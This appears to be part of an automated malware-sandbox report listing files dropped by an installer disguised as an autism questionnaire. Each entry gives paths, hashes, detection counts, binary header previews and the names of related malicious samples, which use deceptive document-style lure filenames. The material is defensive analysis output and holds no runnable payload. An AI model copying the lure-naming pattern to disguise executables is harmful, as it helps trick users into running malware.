                                                                                            SHA-512:05AD5EB7A34414503CAE547813BFF50CA792C1895D444402CA63631F41D23AADB9695FA6352B96209969FD88A52EFC6DFF71C21A077140C37142DAC38CCFFCEE
                                                                                            Malicious:false
                                                                                            Preview: 2021/12/11-14:40:58.579 1c18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/12/11-14:40:58.580 1c18 Recovering log #3.2021/12/11-14:40:58.581 1c18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131072
                                                                                            Entropy (8bit):0.012068139037335553
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ImtVOb+j4x9pPlXlaWMtlnyPll//zVrzlltD0lGQZ7XEZhGIelHdP4/X:IiV0g4x9pdyt2//hFwl570ZhdelG/
                                                                                            MD5:AA497CF5DFF0E22EDE9DB121E8F5F205
                                                                                            SHA1:335D33FDAB84EA6E02590D0A2025220BCC91A53B
                                                                                            SHA-256:98761AF76D97F04AEFCF7D4A65C2E5CDC6148A1633FB39A90F711EDD8BCCF9AE
                                                                                            SHA-512:4E712F703E8DF36827EE94C971DBCA82841948A2E66712A43905AE8B713AE4EBE4ACBCF1C44F63F62D13F6C4B9C12D490B128E504BA501D8320241BD0922F1E0
                                                                                            Malicious:false
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-211211235601Z-181.bmp
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32
                                                                                            Category:dropped
                                                                                            Size (bytes):71190
                                                                                            Entropy (8bit):3.23538305871218
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:2Sk6OAOEDyoMJLCEwlMDNVRXwII7c7JOhXGFIgCd1sDuRvYfEU0NsgDW9ATCj8wq:YF6DSwlI5R7JEx3sKvjWu3xOfePn
                                                                                            MD5:867476F332723EC610B15F7D07FED484
                                                                                            SHA1:EF619DB72371B0BDCB7D06338B2FAEFFE9E39DB4
                                                                                            SHA-256:48E1744D768D4B39B88B829D3D1E891A1619B49FA968AB7BC5C4471D95DD23B3
                                                                                            SHA-512:35C989E10870830F1DE7C16D8D310ABA56F288FF75EA70A6A3612BACFDCDF94D8B5D2E06FC2D0D9E79D85FD709ABB26DCFFA70FE48BABFE20BF70B16A755A16A
                                                                                            Malicious:false
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3024000
                                                                                            Category:modified
                                                                                            Size (bytes):61440
                                                                                            Entropy (8bit):3.564625031101348
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:3eI9dThltELJ8fwRRwZsLRGlKhsvXh+vSc:tkYZsLQhUSc
                                                                                            MD5:87746036B6A698C8413860EC06F30FFF
                                                                                            SHA1:6F884BBB9CC9A596A9AB6640C44E3EAF7C11569F
                                                                                            SHA-256:AB16B566F8FEFD8C2A5FB4B2850D5C36E79D9D3BF0BC7DA12FF2357776EF7CF2
                                                                                            SHA-512:FBD48C4A4BE070AF337FF71D080749F6B2F22CD42AF995614474BB878168CE51A3048499D7CAD27ADBD6237825537660342691136FEEA57CFF20C61139149DDD
                                                                                            Malicious:false
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):3.284347528849945
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:7Mgom1CYiomgiom2om1Nom1Aiom1RROiom1oom1pom14ZiomVsiomgcgqQlmFTIZ:7cY7OhcCscgN49IVXEBodRBkA
                                                                                            MD5:D64E95B252745E15292566310E4E72EC
                                                                                            SHA1:F206060FCE5647B60C1A6EF5D34B0FF896501D67
                                                                                            SHA-256:15EA61003CC83549D7E250DDF7DC09F3C162D2B699B87EE2FD1343D9B4D44D07
                                                                                            SHA-512:F9B5C2B8F53375E86754F05AE4A51A98C80893F983CE6EF87670DEF485DC3E7ED4485E969703FF94C8E64D9AC3858BC442A1227A712B512FE4D5B81587B4D61E
                                                                                            Malicious:false
                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.5356
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):157443
                                                                                            Entropy (8bit):5.172039478677
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
                                                                                            MD5:A2C6972A1A9506ACE991068D7AD37098
                                                                                            SHA1:BF4D2684587CF034BCFC6F74CED551F9E5316440
                                                                                            SHA-256:0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
                                                                                            SHA-512:4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
                                                                                            Malicious:false
                                                                                            Preview: %!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):157443
                                                                                            Entropy (8bit):5.172039478677
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:amNTjRlaRlQShhp2VpMKRhWa11quVJzlzofqG9Z0ADWp1ttawvayKLWbVG3+2:RNj3aRlQShhp2VpMKRhWa11quVJX2
                                                                                            MD5:A2C6972A1A9506ACE991068D7AD37098
                                                                                            SHA1:BF4D2684587CF034BCFC6F74CED551F9E5316440
                                                                                            SHA-256:0FB687D20C49DDBADD42ABB489C3B492B5A1893352E2F4B6AA1247EFE7363F65
                                                                                            SHA-512:4D03884CA5D1652A79E6D55D8F92F4D138C47D462E05C3E6A685DA6742E98841D9C63720727203B913A179892C413BFB33C05416E1675E0CF80DA98BE90BA5E4
                                                                                            Malicious:false
                                                                                            Preview: %!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Marlett.FamilyName:Marlett.StyleName:Regular.MenuName:Marlett.StyleBits:0.WeightClass:500.WidthClass:5.AngleClass:0.FullName:Marlett.WritingScript:Roman.WinName:Marlett.FileLength:27724.NameArray:0,Win,1,Marlett.NameArray:0,Mac,4,Marlett.NameArray:0,Win,1,Marlett.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:ArialMT.FamilyName:Arial.StyleName:Regular.MenuName:Arial.StyleBits:0.WeightClass:400.WidthClass:5.AngleClass:0.FullName:Arial.WritingScript:Roman.WinName:Arial.FileLength:1036584.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial.NameArray:0,Win,1,Arial.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Arial-BoldMT.FamilyName:Arial.StyleName:Bold.MenuName:Arial.StyleBits:2.WeightClass:700.WidthClass:5.AngleClass:0.FullName:Arial Bold.WritingScript:Roman.WinName:Arial Bold.FileLength:980756.NameArray:0,Win,1,Arial.NameArray:0,Mac,4,Arial Bold.NameAr
                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):8003
                                                                                            Entropy (8bit):4.839308921501875
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                            MD5:937C6E940577634844311E349BD4614D
                                                                                            SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                            SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                            SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                            Malicious:false
                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):19540
                                                                                            Entropy (8bit):5.587475606743866
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:+tyfGhuq0/sVbX+uH3ISBKn+FmbWjul5IzlYQmhuETf7cGFWPXw:oOG+u44K+FmbWCl54oX
                                                                                            MD5:073639F13AD7B59EDCD0504B839875AC
                                                                                            SHA1:87DA7C3F5DCC5CFB9C3CA489F186C4FFAC4741D1
                                                                                            SHA-256:F60A4C78425DCE67F00DF4C24E0D832AAA57134A06D2D2D757A557D7D0A1BA4A
                                                                                            SHA-512:CFE7BFCF4DE0D69E6F1AC1BC5EFBA23F1274035100A8CAFC2850DDAA228AFBC032A7D3F6276889B17D81236F94188FAD99D87826106813E26FD2FD4B498391B7
                                                                                            Malicious:false
                                                                                            Preview: @...e...................h.................I..........@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)A.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0iwqijbw.lgz.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ljieogp.q2i.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdekav2v.k3o.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftjtge00.kch.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqsb1rib.anu.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ju4ihbqg.20l.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgj32aem.s4e.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_riiu5vtd.0np.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uc3q3u0g.0n3.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycp1urbi.5ym.psm1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yoaqero5.taq.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzom5gkv.jua.ps1
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview: 1
                                                                                            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):35616
                                                                                            Entropy (8bit):6.953519176025623
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: 6rfyiAq0nM.msi, Detection: malicious, Browse
                                                                                            • Filename: ListSvc.exe, Detection: malicious, Browse
                                                                                            • Filename: Freddie-Mac-Warrantable-Condo-List.exe, Detection: malicious, Browse
                                                                                            • Filename: iumk21HlC8.exe, Detection: malicious, Browse
                                                                                            • Filename: FxWNeUN38R.exe, Detection: malicious, Browse
                                                                                            • Filename: 7CiwBIK7nr.exe, Detection: malicious, Browse
                                                                                            • Filename: 978B4AC05A227B23EF7E4FADFF92966339BA1413BAC5A.exe, Detection: malicious, Browse
                                                                                            • Filename: Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe, Detection: malicious, Browse
                                                                                            • Filename: How-To-Get-A-Statement-From-Netspend.exe, Detection: malicious, Browse
                                                                                            • Filename: gj13C7atN2.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6144
                                                                                            Entropy (8bit):4.720366600008286
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: BF1.exe, Detection: malicious, Browse
                                                                                            • Filename: AIlUgor6h7.exe, Detection: malicious, Browse
                                                                                            • Filename: 7S6KBG5w7W.exe, Detection: malicious, Browse
                                                                                            • Filename: 4r4WFkpvvq.exe, Detection: malicious, Browse
                                                                                            • Filename: 21ABA879CA90E3D4B3B58F61316B6B42C97D31F62DEA2.exe, Detection: malicious, Browse
                                                                                            • Filename: 5Yi7XQkHUQ.exe, Detection: malicious, Browse
                                                                                            • Filename: 991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe, Detection: malicious, Browse
                                                                                            • Filename: 67MPsax8fd.exe, Detection: malicious, Browse
                                                                                            • Filename: B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exe, Detection: malicious, Browse
                                                                                            • Filename: 2HFJezUWHA.exe, Detection: malicious, Browse
                                                                                            • Filename: OabbZE2zf1.exe, Detection: malicious, Browse
                                                                                            • Filename: MiNj1lDY5T.exe, Detection: malicious, Browse
                                                                                            • Filename: 1Edyk9e6oL.exe, Detection: malicious, Browse
                                                                                            • Filename: caYfUkPlTx.exe, Detection: malicious, Browse
                                                                                            • Filename: 8CY6nr1mmt.exe, Detection: malicious, Browse
                                                                                            • Filename: OGzuPn8ahY.exe, Detection: malicious, Browse
                                                                                            • Filename: OPKyR75fJn.exe, Detection: malicious, Browse
                                                                                            • Filename: mapcmapc-registratio_39379648.exe, Detection: malicious, Browse
                                                                                            • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                            • Filename: 42E07EA0F43BEC6913D6AC78FF74536695AE273CD28DB.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
